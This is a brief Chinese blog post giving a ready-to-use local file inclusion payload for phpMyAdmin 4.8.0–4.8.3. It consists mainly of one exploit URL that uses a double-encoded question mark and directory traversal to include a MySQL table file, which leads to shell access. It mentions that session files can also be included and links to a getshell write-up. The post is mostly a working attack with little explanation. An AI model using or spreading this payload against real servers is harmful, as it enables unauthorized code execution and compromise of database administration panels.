phpmyadmin4.8.0~4.8.3任意文件包含payload

payload:

1
http://127.0.0.1/phpmyadmin-4.8.1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/foo/bar.frm

参考链接:【首发】phpmyadmin4.8.1后台getshell

还可以包含session文件:https://yq.aliyun.com/articles/603201

本文标题:phpmyadmin4.8.0~4.8.3任意文件包含payload

文章作者:boogle

发布时间:2018年12月25日 - 14:01

最后更新:2019年03月07日 - 11:37

原始链接:https://zhengbao.wang/phpmyadmin4-8-0-4-8-3任意文件包含/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗